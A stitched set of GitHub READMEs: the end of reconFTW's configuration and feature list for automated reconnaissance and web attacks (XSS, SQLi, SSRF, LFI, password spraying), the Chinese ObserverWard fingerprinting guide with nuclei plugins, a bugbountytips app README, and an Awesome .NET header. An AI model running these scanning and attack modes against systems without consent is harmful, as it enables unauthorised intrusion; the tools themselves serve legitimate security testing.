PROTO_POLLUTION=true
# Extra features
NOTIFICATION=false # Notification for every function
SOFT_NOTIFICATION=false # Only for start/end
DEEP=false
DEEP_LIMIT=500
DEEP_LIMIT2=1500
DIFF=false
REMOVETMP=false
REMOVELOG=false
PROXY=false
SENDZIPNOTIFY=false
PRESERVE=true # set to true to avoid deleting the .called_fn files on really large scans
FFUF_FLAGS="-mc all -fc 404 -ac -sf -s"
# HTTP options
HEADER="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
# Threads
FFUF_THREADS=40
HTTPX_THREADS=50
HTTPX_UNCOMMONPORTS_THREADS=100
GOSPIDER_THREADS=20
BRUTESPRAY_THREADS=20
BRUTESPRAY_CONCURRENCE=10
GAU_THREADS=10
DNSTAKE_THREADS=100
DALFOX_THREADS=200
PUREDNS_PUBLIC_LIMIT=0 # Set between 2000 - 10000 if your router blows up, 0 is unlimited
PUREDNS_TRUSTED_LIMIT=400
PUREDNS_WILDCARDTEST_LIMIT=30
PUREDNS_WILDCARDBATCH_LIMIT=1500000
WEBSCREENSHOT_THREADS=200
GOWITNESS_THREADS=8
RESOLVE_DOMAINS_THREADS=150
PPFUZZ_THREADS=30
DNSVALIDATOR_THREADS=200
INTERLACE_THREADS=10
TLSX_THREADS=1000
# Rate limits
HTTPX_RATELIMIT=150
NUCLEI_RATELIMIT=150
FFUF_RATELIMIT=0
# Timeouts
CMSSCAN_TIMEOUT=3600
FFUF_MAXTIME=900 # Seconds
HTTPX_TIMEOUT=10 # Seconds
HTTPX_UNCOMMONPORTS_TIMEOUT=10 # Seconds
# lists
fuzz_wordlist=${tools}/fuzz_wordlist.txt
lfi_wordlist=${tools}/lfi_wordlist.txt
ssti_wordlist=${tools}/ssti_wordlist.txt
subs_wordlist=${tools}/subdomains.txt
subs_wordlist_big=${tools}/subdomains_big.txt
resolvers=${tools}/resolvers.txt
resolvers_trusted=${tools}/resolvers_trusted.txt
# Axiom Fleet
# Will not start a new fleet if one exist w/ same name and size (or larger)
# AXIOM=false Uncomment only to overwrite command line flags
AXIOM_FLEET_LAUNCH=false
AXIOM_FLEET_NAME="reconFTW"
AXIOM_FLEET_COUNT=5
AXIOM_FLEET_REGIONS="eu-central"
AXIOM_FLEET_SHUTDOWN=true
# This is a script on your reconftw host that might prep things your way...
#AXIOM_POST_START="~/Tools/axiom_config.sh"
AXIOM_EXTRA_ARGS="" # Leave empty if you don't want to add extra arguments
#AXIOM_EXTRA_ARGS="--rm-logs" # Example
# BBRF
BBRF_CONNECTION=false
BBRF_SERVER=https://demo.bbrf.me/bbrf
BBRF_USERNAME="user"
BBRF_PASSWORD="password"
# TERM COLORS
bred='\033[1;31m'
bblue='\033[1;34m'
bgreen='\033[1;32m'
byellow='\033[1;33m'
red='\033[0;31m'
blue='\033[0;34m'
green='\033[0;32m'
yellow='\033[0;33m'
reset='\033[0m'
```
</details>
# Usage:
> Check out the wiki section to know which flag performs what all steps/attacks [Usage Guide](https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide) :book:
**TARGET OPTIONS**
| Flag | Description |
|------|-------------|
| -d | Single Target domain *(example.com)* |
| -l | List of targets *(one per line)* |
| -m | Multiple domain target *(companyName)* |
| -x | Exclude subdomains list *(Out Of Scope)* |
| -i | Include subdomains list *(In Scope)* |
**MODE OPTIONS**
| Flag | Description |
|------|-------------|
| -r | Recon - Full recon process (without attacks like sqli,ssrf,xss,ssti,lfi etc.) |
| -s | Subdomains - Perform only subdomain enumeration, web probing, subdomain takeovers |
| -p | Passive - Perform only passive steps |
| -a | All - Perform whole recon and all active attacks |
| -w | Web - Perform only vulnerability checks/attacks on particular target |
| -n | OSINT - Performs an OSINT scan (no subdomain enumeration and attacks) |
| -c | Custom - Launches specific function against target |
| -h | Help - Show this help menu |
**GENERAL OPTIONS**
| Flag | Description |
|------|-------------|
| --deep | Deep scan (Enable some slow options for deeper scan, _vps intended mode_) |
| -f | Custom config file path |
| -o | Output directory |
| -v | Axiom distributed VPS |
| -q | Rate limit in requests per second |
# Example Usage:
**To perform a full recon on single target**
```bash
./reconftw.sh -d target.com -r
```
**To perform a full recon on a list of targets**
```bash
./reconftw.sh -l sites.txt -r -o /output/directory/
```
**Perform full recon with more time intense tasks** *(VPS intended only)*
```bash
./reconftw.sh -d target.com -r --deep -o /output/directory/
```
**Perform recon in a multi domain target**
```bash
./reconftw.sh -m company -l domains_list.txt -r
```
**Perform recon with axiom integration**
```bash
./reconftw.sh -d target.com -r -v
```
**Perform all steps (whole recon + all attacks) a.k.a. YOLO mode**
```bash
./reconftw.sh -d target.com -a
```
**Show help section**
```bash
./reconftw.sh -h
```
# Axiom Support: :cloud:
![](https://i.ibb.co/Jzrgkqt/axiom-readme.png)
> Check out the wiki section for more info [Axiom Support](https://github.com/six2dez/reconftw/wiki/5.-Axiom-version)
* As reconFTW actively hits the target with a lot of web traffic, hence there was a need to move to Axiom distributing the work load among various instances leading to reduction of execution time.
* During the configuration of axiom you need to select `reconftw` as provisoner.
* You can create your own axiom's fleet before running reconFTW or let reconFTW to create and destroy it automatically just modifying reconftw.cfg file.
# BBRF Support: :computer:
* To add reconFTW results to your [BBRF instance](https://github.com/honoki/bbrf-server) just add IP and credentials on reconftw.cfg file section dedicated to bbrf.
* During the execution of the scans the results will be added dinamically when each step ends.
* Even you can set up locally your BBRF instance to be able to visualize your results in a fancy web UI.
# Sample video:
![Video](images/reconFTW.gif)
# :fire: Features :fire:
## Osint
- Domain information ([whois](https://github.com/rfc1036/whois) and [amass](https://github.com/OWASP/Amass))
- Emails addresses and users ([theHarvester](https://github.com/laramies/theHarvester) and [emailfinder](https://github.com/Josue87/EmailFinder))
- Password leaks ([pwndb](https://github.com/davidtavarez/pwndb) and [H8mail](https://github.com/khast3x/h8mail))
- Metadata finder ([MetaFinder](https://github.com/Josue87/MetaFinder))
- Google Dorks ([dorks_hunter](https://github.com/six2dez/dorks_hunter))
- Github Dorks ([gitdorks_go](https://github.com/damit5/gitdorks_go))
## Subdomains
- Passive ([amass](https://github.com/OWASP/Amass) and [github-subdomains](https://github.com/gwen001/github-subdomains))
- Certificate transparency ([ctfr](https://github.com/UnaPibaGeek/ctfr))
- NOERROR subdomain discovery ([dnsx](https://github.com/projectdiscovery/dnsx), more info [here](https://www.securesystems.de/blog/enhancing-subdomain-enumeration-ents-and-noerror/))
- Bruteforce ([puredns](https://github.com/d3mondev/puredns))
- Permutations ([Gotator](https://github.com/Josue87/gotator))
- JS files & Source Code Scraping ([gospider](https://github.com/jaeles-project/gospider))
- DNS Records ([dnsx](https://github.com/projectdiscovery/dnsx))
- Google Analytics ID ([AnalyticsRelationships](https://github.com/Josue87/AnalyticsRelationships))
- TLS handshake ([tlsx](https://github.com/projectdiscovery/tlsx))
- Recursive search.
- Subdomains takeover ([nuclei](https://github.com/projectdiscovery/nuclei))
- DNS takeover ([dnstake](https://github.com/pwnesia/dnstake))
- DNS Zone Transfer ([dig](https://linux.die.net/man/1/dig))
- Cloud checkers ([S3Scanner](https://github.com/sa7mon/S3Scanner) and [cloud_enum](https://github.com/initstring/cloud_enum))
## Hosts
- IP info ([whoisxmlapi API](https://www.whoisxmlapi.com/)
- CDN checker ([ipcdn](https://github.com/six2dez/ipcdn))
- WAF checker ([wafw00f](https://github.com/EnableSecurity/wafw00f))
- Port Scanner (Active with [nmap](https://github.com/nmap/nmap) and passive with [smap](https://github.com/s0md3v/Smap))
- Port services vulnerability checks ([searchsploit](https://github.com/offensive-security/exploitdb))
- Password spraying ([brutespray](https://github.com/x90skysn3k/brutespray))
## Webs
- Web Prober ([httpx](https://github.com/projectdiscovery/httpx) and [unimap](https://github.com/Edu4rdSHL/unimap))
- Web screenshot ([webscreenshot](https://github.com/maaaaz/webscreenshot) or [gowitness](https://github.com/sensepost/gowitness))
- Web templates scanner ([nuclei](https://github.com/projectdiscovery/nuclei) and [nuclei geeknik](https://github.com/geeknik/the-nuclei-templates.git))
- Url extraction ([waybackurls](https://github.com/tomnomnom/waybackurls), [gau](https://github.com/lc/gau), [gospider](https://github.com/jaeles-project/gospider), [github-endpoints](https://gist.github.com/six2dez/d1d516b606557526e9a78d7dd49cacd3) and [JSA](https://github.com/w9w/JSA))
- URLPatterns Search and filtering ([urless](https://github.com/xnl-h4ck3r/urless), [gf](https://github.com/tomnomnom/gf) and [gf-patterns](https://github.com/1ndianl33t/Gf-Patterns))
- XSS ([dalfox](https://github.com/hahwul/dalfox))
- Open redirect ([Oralyzer](https://github.com/r0075h3ll/Oralyzer))
- SSRF (headers [interactsh](https://github.com/projectdiscovery/interactsh) and param values with [ffuf](https://github.com/ffuf/ffuf))
- CRLF ([crlfuzz](https://github.com/dwisiswant0/crlfuzz))
- Favicon Real IP ([fav-up](https://github.com/pielco11/fav-up))
- Javascript analysis ([subjs](https://github.com/lc/subjs), [JSA](https://github.com/w9w/JSA), [xnLinkFinder](https://github.com/xnl-h4ck3r/xnLinkFinder), [getjswords](https://github.com/m4ll0k/BBTz))
- Fuzzing ([ffuf](https://github.com/ffuf/ffuf))
- Cors ([Corsy](https://github.com/s0md3v/Corsy))
- LFI Checks ([ffuf](https://github.com/ffuf/ffuf))
- SQLi Check ([SQLMap](https://github.com/sqlmapproject/sqlmap))
- SSTI ([ffuf](https://github.com/ffuf/ffuf))
- CMS Scanner ([CMSeeK](https://github.com/Tuhinshubhra/CMSeeK))
- SSL tests ([testssl](https://github.com/drwetter/testssl.sh))
- Broken Links Checker ([gospider](https://github.com/jaeles-project/gospider))
- Prototype Pollution ([ppfuzz](https://github.com/dwisiswant0/ppfuzz))
- URL sorting by extension
- Wordlist generation
- Passwords dictionary creation ([pydictor](https://github.com/LandGrey/pydictor))
## Extras
- Multithread ([Rush](https://github.com/shenwei356/rush))
- Custom resolvers generated list ([dnsvalidator](https://github.com/vortexau/dnsvalidator))
- Docker container included and [DockerHub](https://hub.docker.com/r/six2dez/reconftw) integration
- Ansible + Terraform deployment over AWS
- Allows IP/CIDR as target
- Resume the scan from last performed step
- Custom output folder option
- All in one installer/updater script compatible with most distros
- Diff support for continuous running (cron mode)
- Support for targets with multiple domains
- Raspberry Pi/ARM support
- 6 modes (recon, passive, subdomains, web, osint and all)
- Out of Scope Support + optional [inscope](https://github.com/tomnomnom/hacks/tree/master/inscope) support
- Notification system with Slack, Discord and Telegram ([notify](https://github.com/projectdiscovery/notify)) and sending zipped results support
# Mindmap/Workflow
![Mindmap](images/mindmapv2.png)
## Data Keep
Follow these simple steps to end up having a private repository with your `API Keys` and `/Recon` data.
* Create a private __blank__ repository on `Git(Hub|Lab)` (Take into account size limits regarding Recon data upload)
* Clone your project: `git clone https://gitlab.com/example/reconftw-data`
* Get inside the cloned repository: `cd reconftw-data`
* Create branch with an empty commit: `git commit --allow-empty -m "Empty commit"`
* Add official repo as a new remote: `git remote add upstream https://github.com/six2dez/reconftw` (`upstream` is an example)
* Update upstream's repo: `git fetch upstream`
* Rebase current branch with the official one: `git rebase upstream/main master`
### Main commands:
* Upload changes to your personal repo: `git add . && git commit -m "Data upload" && git push origin master`
* Update tool anytime: `git fetch upstream && git rebase upstream/main master`
## How to contribute:
If you want to contribute to this project you can do it in multiple ways:
- Submitting an [issue](https://github.com/six2dez/reconftw/issues/new/choose) because you have found a bug or you have any suggestion or request.
- Making a Pull Request from [dev](https://github.com/six2dez/reconftw/tree/dev) branch because you want to improve the code or add something to the script.
## Need help? :information_source:
- Take a look at the [wiki](https://github.com/six2dez/reconftw/wiki) section.
- Check [FAQ](https://github.com/six2dez/reconftw/wiki/7.-FAQs) for commonly asked questions.
- Ask for help in the [Telegram group](https://t.me/joinchat/TO_R8NYFhhbmI5co)
## Support this project
### Buymeacoffee
[<img src="https://cdn.buymeacoffee.com/buttons/v2/default-green.png">](https://www.buymeacoffee.com/six2dez)
### DigitalOcean referral link
<a href="https://www.digitalocean.com/?refcode=f362a6e193a1&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge"><img src="https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg" alt="DigitalOcean Referral Badge" /></a>
### GitHub sponsorship
[Sponsor](https://github.com/sponsors/six2dez)
# Sponsors ❤️
**This section shows the current financial sponsors of this project**
[<img src="https://pbs.twimg.com/profile_images/1360304248534282240/MomOFi40_400x400.jpg" width="100" height=auto>](https://github.com/0xtavian)
# Thanks :pray:
* Thank you for lending a helping hand towards the development of the project!
- [C99](https://api.c99.nl/)
- [CIRCL](https://www.circl.lu/)
- [NetworksDB](https://networksdb.io/)
- [ipinfo](https://ipinfo.io/)
- [hackertarget](https://hackertarget.com/)
- [Censys](https://censys.io/)
- [Fofa](https://fofa.info/)
- [intelx](https://intelx.io/)
# Disclaimer
Usage of this program for attacking targets without consent is illegal. It is the user's responsibility to obey all applicable laws. The developer assumes no liability and is not responsible for any misuse or damage caused by this program. Please use responsibly.
The material contained in this repository is licensed under GNU GPLv3.
|
![logo](docs/images/logo.png)
[中文简体](./README.md)
# ObserverWard
| 类别 | 说明 |
|-----|--------------------------------------------------------|
| 作者 | [三米前有蕉皮](https://github.com/cn-kali-team) |
| 团队 | [0x727](https://github.com/0x727) 未来一段时间将陆续开源工具 |
| 定位 | 社区化[指纹库](https://github.com/0x727/FingerprintHub)识别工具。 |
| 语言 | Rust |
| 功能 | 命令行Web指纹识别工具 |
## 安装
### 1. 源码手动安装
```bash
git clone https://github.com/0x727/ObserverWard
cd ObserverWard
cargo build --target x86_64-unknown-linux-musl --release --all-features
```
- 更多安装细节请查看当前项目的Actions自动化编译构建流程[文件](https://github.com/0x727/ObserverWard/blob/main/.github/workflows/basic.yml)。
### 2. 下载二进制安装
- 因为添加了`--update_self`参数,方便更新固定了标签,每次更新代码都会自动重新编译发布到`default`版本,所以`default`永远是最新的版本。
- [发行版本](https://github.com/0x727/ObserverWard/releases)下载页面。
### 3. Mac系统
```shell
brew install observer_ward
```
## 使用方法
```bash
➜ ~ ./observer_ward -h
observer_ward 2022.3.14
author: Kali-Team
about: Community based web fingerprint analysis tool.
USAGE:
observer_ward [OPTIONS]
OPTIONS:
-c, --csv <CSV> Export to the csv file or Import form the csv file
--daemon API background service
-f, --file <FILE> Read the target from the file
-h, --help Print help information
-j, --json <JSON> Export to the json file or Import form the json file
--plugins <plugins> The 'plugins' directory is used when the parameter is the 'default'
--proxy <PROXY> Proxy to use for requests (ex: [http(s)|socks5(h)]://host:port)
-s, --rest_api <SERVER> Start a web API service (ex: 127.0.0.1:8080)
--service Using nmap fingerprint identification service (slow)
--silent Silent mode
--stdin Read url(s) from STDIN
-t, --target <TARGET> The target URL(s) (required, unless --stdin used)
--thread <THREAD> Number of concurrent threads. [default: 100]
--timeout <TIMEOUT> Set request timeout. [default: 10]
--token <token> API Bearer authentication
-u, --update_fingerprint Update web fingerprint
--update_plugins Update nuclei plugins
--update_self Update self
-V, --version Print version information
--verify <verify> Validate the specified yaml file
--webhook <WEBHOOK> Send results to webhook server (ex: https://host:port/webhook)
```
### 更新指纹
- 使用`-u`参数从指纹库中更新指纹,也可以自己从[指纹库项目](https://0x727.github.io/FingerprintHub/web_fingerprint_v3.json)下载当前系统对应目录。
- 如果在程序的运行目录有`web_fingerprint_v3.json`文件会使用运行目录下的指纹库,不会读取下面表格中系统对于的目录。
| 系统 | 路径 |
|---------|--------------------------------------------------------------------------------|
| Windows | C:\Users\Alice\AppData\Roaming\observer_ward\web_fingerprint_v3.json |
| Linux | /home/alice/.config/observer_ward/web_fingerprint_v3.json |
| macOS | /Users/Alice/Library/Application Support/observer_ward/web_fingerprint_v3.json |
```bash
➜ ~ ./observer_ward_amd64 -u
update: /home/kali-team/.config/observer_ward/web_fingerprint_v3.json file size => 953771
```
### 更新插件
- 使用`--update_plugins`
从[指纹库项目](https://github.com/0x727/FingerprintHub/releases/download/default/plugins.zip)下载插件压缩包到用户配置目录。
- 并自动解压到当前系统对应目录,当使用`--plugins default`参数时会默认使用这个目录下的插件。
- 更新会删除原来的目录,重新解压覆盖。
| 系统 | 路径 |
|---------|----------------------------------------------------------------|
| Windows | C:\Users\Alice\AppData\Roaming\observer_ward\plugins |
| Linux | /home/alice/.config/observer_ward/plugins |
| macOS | /Users/Alice/Library/Application Support/observer_ward/plugins |
### 验证指纹是否有效
- `--verify`指定要验证的指纹yaml文件路径,`-t`指定要识别的目标,输出请求过程和识别结果。
```bash
➜ ~ ./observer_ward -t https://www.example.com --verify 0example.yaml
Url: https://www.example.com/
Headers:
x-cache: HIT
accept-ranges: bytes
age: 212697
cache-control: max-age=604800
content-type: text/html; charset=UTF-8
date: Thu, 14 Apr 2022 03:09:03 GMT
etag: "3147526947"
expires: Thu, 21 Apr 2022 03:09:03 GMT
last-modified: Thu, 17 Oct 2019 07:18:26 GMT
server: ECS (sab/5783)
vary: Accept-Encoding
StatusCode: 200 OK
Text:
<!doctype html>
<html>
<head>
<title>example domain</title>
<meta charset="utf-8" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<style type="text/css">
body {
background-color: #f0f0f2;
margin: 0;
padding: 0;
font-family: -apple-system, system-ui, blinkmacsystemfont, "segoe ui", "open sans", "helvetica neue", helvetica, arial, sans-serif;
}
div {
width: 600px;
margin: 5em auto;
padding: 2em;
background-color: #fdfdff;
border-radius: 0.5em;
box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);
}
a:link, a:visited {
color: #38488f;
text-decoration: none;
}
@media (max-width: 700px) {
div {
margin: 0 auto;
width: auto;
}
}
</style>
</head>
<body>
<div>
<h1>example domain</h1>
<p>this domain is for use in illustrative examples in documents. you may use this
domain in literature without prior coordination or asking for permission.</p>
<p><a href="https://www.iana.org/domains/example">more information...</a></p>
</div>
</body>
</html>
Favicon: {}
Matching fingerprintV3WebFingerPrint {
name: "0example",
priority: 3,
request: WebFingerPrintRequest {
path: "/",
request_method: "get",
request_headers: {},
request_data: "",
},
match_rules: WebFingerPrintMatch {
status_code: 0,
favicon_hash: [],
headers: {},
keyword: [
"<title>Example Domain</title>",
],
},
}
[ https://www.example.com |["0example"] | 1256 | 200 | example domain ]
Important technology:
+-------------------------+----------+--------+-------------+----------------+----------+
| url | name | length | status_code | title | priority |
+=========================+==========+========+=============+================+==========+
| https://www.example.com | 0example | 1256 | 200 | example domain | 5 |
+-------------------------+----------+--------+-------------+----------------+----------+
```
### 单个目标识别
```bash
➜ ~ ./observer_ward -t https://httpbin.org
[ https://httpbin.org |["swagger"] | 9593 | 200 | httpbin.org ]
Important technology:
+---------------------+---------+--------+-------------+-------------+----------+
| url | name | length | status_code | title | priority |
+=====================+=========+========+=============+=============+==========+
| https://httpbin.org | swagger | 9593 | 200 | httpbin.org | 5 |
+---------------------+---------+--------+-------------+-------------+----------+
```
### 从文件获取要识别的目标
```bash
➜ ~ ./observer_ward -f target.txt
```
### 从标准输出获取识别目标
```bash
➜ ~ cat target.txt| ./observer_ward --stdin
```
- 结果和从文件获取的效果一样,这里不再截图展示。
### 导出结果到JSON文件
```bash
➜ ~ ./observer_ward -t https://httpbin.org -j result.json
[ https://httpbin.org |["swagger"] | 9593 | 200 | httpbin.org ]
Important technology:
+---------------------+---------+--------+-------------+-------------+----------+
| url | name | length | status_code | title | priority |
+=====================+=========+========+=============+=============+==========+
| https://httpbin.org | swagger | 9593 | 200 | httpbin.org | 5 |
+---------------------+---------+--------+-------------+-------------+----------+
➜ ~ cat result.json
[{"url":"https://httpbin.org","name":["swagger"],"priority":5,"length":9593,"title":"httpbin.org","status_code":200,"is_web":true,"plugins":[]}]
```
### 导出结果到CSV文件
```bash
➜ ~ ./observer_ward -t https://httpbin.org -c result.csv
[ https://httpbin.org |["swagger"] | 9593 | 200 | httpbin.org ]
Important technology:
+---------------------+---------+--------+-------------+-------------+----------+
| url | name | length | status_code | title | priority |
+=====================+=========+========+=============+=============+==========+
| https://httpbin.org | swagger | 9593 | 200 | httpbin.org | 5 |
+---------------------+---------+--------+-------------+-------------+----------+
➜ ~ cat result.csv
url,name,length,status_code,title,priority
https://httpbin.org,swagger,9593,200,httpbin.org,5
```
- 关于打开csv文件中文乱码问题,和系统环境变量有关,会导致保存文件的编码为UTF-8,Mac系统或者Linux可以使用以下命令转换导出文件编码:
```bash
iconv -f UTF-8 -t GB18030 Result.csv > Result.csv
```
- Window系统可以使用记事本打开csv文件后另存为,选择保存编码ANSI或者Unicode。
### 调用Nuclei检测漏洞
- **请确保nuclei更新至`2.5.3`以上版本**
- 如果需要使用[nuclei](https://github.com/projectdiscovery/nuclei)检测漏洞,需要首先安装`Nuclei`到当前目录,或者是加入环境变量里面,让`observe_ward`可以正常调用。
- 再下载[指纹库中的插件](https://github.com/0x727/FingerprintHub/tree/main/plugins)到当前目录下,或者使用`--update_plugins`插件。
- 在[指纹库](https://github.com/0x727/FingerprintHub/tree/main/plugins)中已经对部分组件的插件进行了分类。
- 如果识别到的组件在`plugins`目录下存在和组件同名的文件夹,会对目标调用Nuclei使用匹配到的插件进行检测,存在漏洞会输出到屏幕。
- 因为经过测试在指纹识别过程中同时调用nuclei检测漏洞会影响Web指纹识别的效果,也会拉长识别的时间,所以选择识别完Web指纹后将结果保存到文件,再解析文件调用nuclei检测。
- 目前支持将Web指纹识别的结果保存为`json`和`csv`格式,所以只能解析这两种格式。
```bash
➜ ~ ./observer_ward_amd64 -t https://httpbin.org --csv result.csv --plugins 0x727/FingerprintHub/plugins
__ __ ______ ______ _____
/\ \ _ \ \ /\ __ \ /\ == \ /\ __-.
\ \ \/ ".\ \ \ \ __ \ \ \ __< \ \ \/\ \
\ \__/".~\_\ \ \_\ \_\ \ \_\ \_\ \ \____-
\/_/ \/_/ \/_/\/_/ \/_/ /_/ \/____/
Community based web fingerprint analysis tool.
_____________________________________________
: https://github.com/0x727/FingerprintHub :
: https://github.com/0x727/ObserverWard :
--------------------------------------------
[ https://httpbin.org |["swagger"] | 9593 | 200 | httpbin.org ]
Important technology:
+---------------------+---------+--------+-------------+-------------+----------+
| url | name | length | status_code | title | priority |
+=====================+=========+========+=============+=============+==========+
| https://httpbin.org | swagger | 9593 | 200 | httpbin.org | 5 |
+---------------------+---------+--------+-------------+-------------+----------+
Important technology:
+---------------------+---------+--------+-------------+-------------+----------+------------+
| url | name | length | status_code | title | priority | plugins |
+=====================+=========+========+=============+=============+==========+============+
| https://httpbin.org | swagger | 9593 | 200 | httpbin.org | 5 | swagger-api|
+---------------------+---------+--------+-------------+-------------+----------+------------+
```
- 同理`json`格式也可以。
```bash
➜ ~ ./observer_ward_amd64 -f target.txt --json result.json --plugins 0x727/FingerprintHub/plugins
```
- 使用默认插件目录`default`
```bash
➜ ~ ./observer_ward_amd64 -f target.txt --json result.json --plugins default
```
### WebHook
```python
from flask import Flask, request
app = Flask(__name__)
@app.route("/webhook", methods=['POST'])
def observer_ward_webhook():
print(request.json)
return 'ok'
if __name__ == '__main__':
app.run()
```
- 开启webhook后,添加`--webhook`参数,将识别的结果发送到webhook服务器。
```shell
➜ ~ ./observer_ward_amd64 -f target.txt --webhook http://127.0.0.1:5000/webhook
```
Webhook json格式:
``` json
{
"is_web":true,
"length":9593,
"name":[
"swagger"
],
"plugins":[
],
"priority":5,
"status_code":200,
"title":"httpbin.org",
"url":"https://httpbin.org/"
}
```
### 开启API服务
- 使用`rest_api`参数提供监听地址和端口开启rest-api服务,使用`--daemon`参数将服务放到后台进程(不支持Window系统)。
- 如果需要支持`https`协议,需要生成`cert.pem`和`key.pem`文件放到程序配置目录,例如:Linux系统下的`/home/alice/.config/observer_ward/`。
- 生成证书文件
```shell
mkcert -key-file key.pem -cert-file cert.pem localhost
```
```shell
➜ ~ ./observer_ward --rest_api 127.0.0.1:8000 --token 22e038328151a7a06fd4ebfa63a10228
__ __ ______ ______ _____
/\ \ _ \ \ /\ __ \ /\ == \ /\ __-.
\ \ \/ ".\ \ \ \ __ \ \ \ __< \ \ \/\ \
\ \__/".~\_\ \ \_\ \_\ \ \_\ \_\ \ \____-
\/_/ \/_/ \/_/\/_/ \/_/ /_/ \/____/
Community based web fingerprint analysis tool.
_____________________________________________
: https://github.com/0x727/FingerprintHub :
: https://github.com/0x727/ObserverWard :
--------------------------------------------
API service has been started:https://127.0.0.1:8000/v1/observer_ward
Request:
curl --request POST \
--url https://127.0.0.1:8000/v1/observer_ward \
--header 'Authorization: Bearer 22e038328151a7a06fd4ebfa63a10228' \
--header 'Content-Type: application/json' \
--data '{"targets":["https://httpbin.org/"]}'
Response:
[{"url":"http://httpbin.org/","name":["swagger"],"priority":5,"length":9593,"title":"httpbin.org","status_code":200,"is_web":true,"plugins":[]}]
```
- 更新配置接口,更新配置时会对识别服务上锁,`GET`方法可以回去当前配置,`POST`方法对配置全量更新,未设置的字段为默认值。
```shell
curl --request POST \
--url http://127.0.0.1:8000/v1/config \
--header 'Authorization: Bearer 22e038328151a7a06fd4ebfa63a10228' \
--header 'Content-Type: application/json' \
--data '{
"update_fingerprint": false
}'
```
- 其他可选参数,`update_fingerprint`,`update_plugins`只能在更新配置接口下使用;其他参数可以在提交任务时和目标附加在一起。
- 当`webhook`不为空时会异步将结果推到设置的WebHook服务器,并立即返回提示响应。
```json
{
"targets": [],
"update_fingerprint": false,
"proxy": "",
"timeout": 10,
"plugins": "",
"update_plugins": false,
"thread": 100,
"webhook": "",
"service": false
}
```
### 静默模式
- `--silent`参数为静默模式,不会输出任何信息,结果需要保存在文件,方便在webshell执行。
## 提交指纹
- ObserverWard使用到的指纹规则全部来自[FingerprintHub](https://github.com/0x727/FingerprintHub)项目。
- 如果需要获取指纹库和提交指纹规则,请查看[FingerprintHub](https://github.com/0x727/FingerprintHub)项目。
## 为ObserverWard_0x727做贡献
### 提交代码
- 点击Fork按钮克隆这个项目到你的仓库
```bash
git clone git@github.com:你的个人github用户名/ObserverWard.git
```
- 添加上游接收更新
```bash
cd ObserverWard
git remote add upstream git@github.com:0x727/ObserverWard.git
git fetch upstream
```
- 配置你的github个人信息
```bash
git config --global user.name "$GITHUB_USERNAME"
git config --global user.email "$GITHUB_EMAIL"
git config --global github.user "$GITHUB_USERNAME"
```
- 拉取所有分支的规则
```bash
git fetch --all
git fetch upstream
```
- **不要**直接在`main`分支上修改,例如我想修改某个bug,创建一个新的分支并切换到新的分支。
```bash
git checkout -b dev
```
- 修改完成后,测试通过
- 跟踪修改和提交Pull-Requests。
```
git add 你添加或者修改的文件名
git commit -m "添加你的描述"
git push origin dev
```
- 打开你Fork这个项目的地址,点击与上游合并,等待审核合并代码。
### 提交建议
ObserverWard 是一个免费且开源的项目,我们欢迎任何人为其开发和进步贡献力量。
- 在使用过程中出现任何问题,可以通过 issues 来反馈。
- Bug 的修复可以直接提交 Pull Request 到 dev 分支。
- 如果是增加新的功能特性,请先创建一个 issue 并做简单描述以及大致的实现方法,提议被采纳后,就可以创建一个实现新特性的 Pull Request。
- 欢迎对说明文档做出改善,帮助更多的人使用 ObserverWard,特别是英文文档。
- 贡献代码请提交 PR 至 dev 分支,master 分支仅用于发布稳定可用版本。
- 如果你有任何其他方面的问题或合作,欢迎发送邮件至 0x727Team@gmail.com 。
## Stargazers over time
[![Stargazers over time](https://starchart.cc/0x727/ObserverWard.svg)](https://github.com/0x727/ObserverWard)
|
<h1 align="center">bugbountytips</h1>
<h4 align="center">Single page webapp to perform regexp search over GitHub search.</h4>
<p align="center">
<img src="https://img.shields.io/badge/php-%3E=7.2.5-blue" alt="php badge">
<img src="https://img.shields.io/badge/license-MIT-green" alt="MIT license badge">
<a href="https://twitter.com/intent/tweet?text=https%3a%2f%2fgithub.com%2fgwen001%2fbugbountytips%2f" target="_blank"><img src="https://img.shields.io/twitter/url?style=social&url=https%3A%2F%2Fgithub.com%2Fgwen001%2Fbugbountytips" alt="twitter badge"></a>
</p>
<!-- <p align="center">
<img src="https://img.shields.io/github/stars/gwen001/bugbountytips?style=social" alt="github stars badge">
<img src="https://img.shields.io/github/watchers/gwen001/bugbountytips?style=social" alt="github watchers badge">
<img src="https://img.shields.io/github/forks/gwen001/bugbountytips?style=social" alt="github forks badge">
</p> -->
---
## Description
[#bugbountytips](http://bugbountytips.me) is a single page website made with love, by hackers for hackers.
It's supposed to help to find useful tips on Twitter trought the hashtag [#bugbountytips](https://twitter.com/search?q=%23bugbountytips&src=typed_query&f=live).
This webservice is my contribution to the security industry, if you like it, you can support my work.
## Install
```
git clone https://github.com/gwen001/bugbountytips
cd bugbountytips
composer update && composer install
```
Edit `.env` file:
```
APP_NAME=bugbountytips
APP_ENV=local
APP_KEY=base64:HMpa3cPt6HTJKRuV5asjrD/vj2P1w8mE71i7LPPG/TI=
APP_DEBUG=true
APP_URL=http://xxx.example.com
APP_ADMIN_LOGIN=admin
APP_ADMIN_PASS=admin
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=bugbountytips
DB_USERNAME=root
DB_PASSWORD=root
# from twitter developers platform
TWITTER_CONSUMER_KEY=
TWITTER_CONSUMER_SECRET=
TWITTER_ACCESS_TOKEN=
TWITTER_ACCESS_TOKEN_SECRET=
```
Migrate database:
```
php artisan migrate:install
php artisan db:seed
```
Run the app:
```
npm install
npm run dev
```
## Note
Since the hashtag has been spammed with so many shit, the project has been abandoned.
---
<img src="https://raw.githubusercontent.com/gwen001/bugbountytips/master/preview.png">
---
Feel free to [open an issue](/../../issues/) if you have any problem with the script.
|
# Awesome .NET!
[![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)
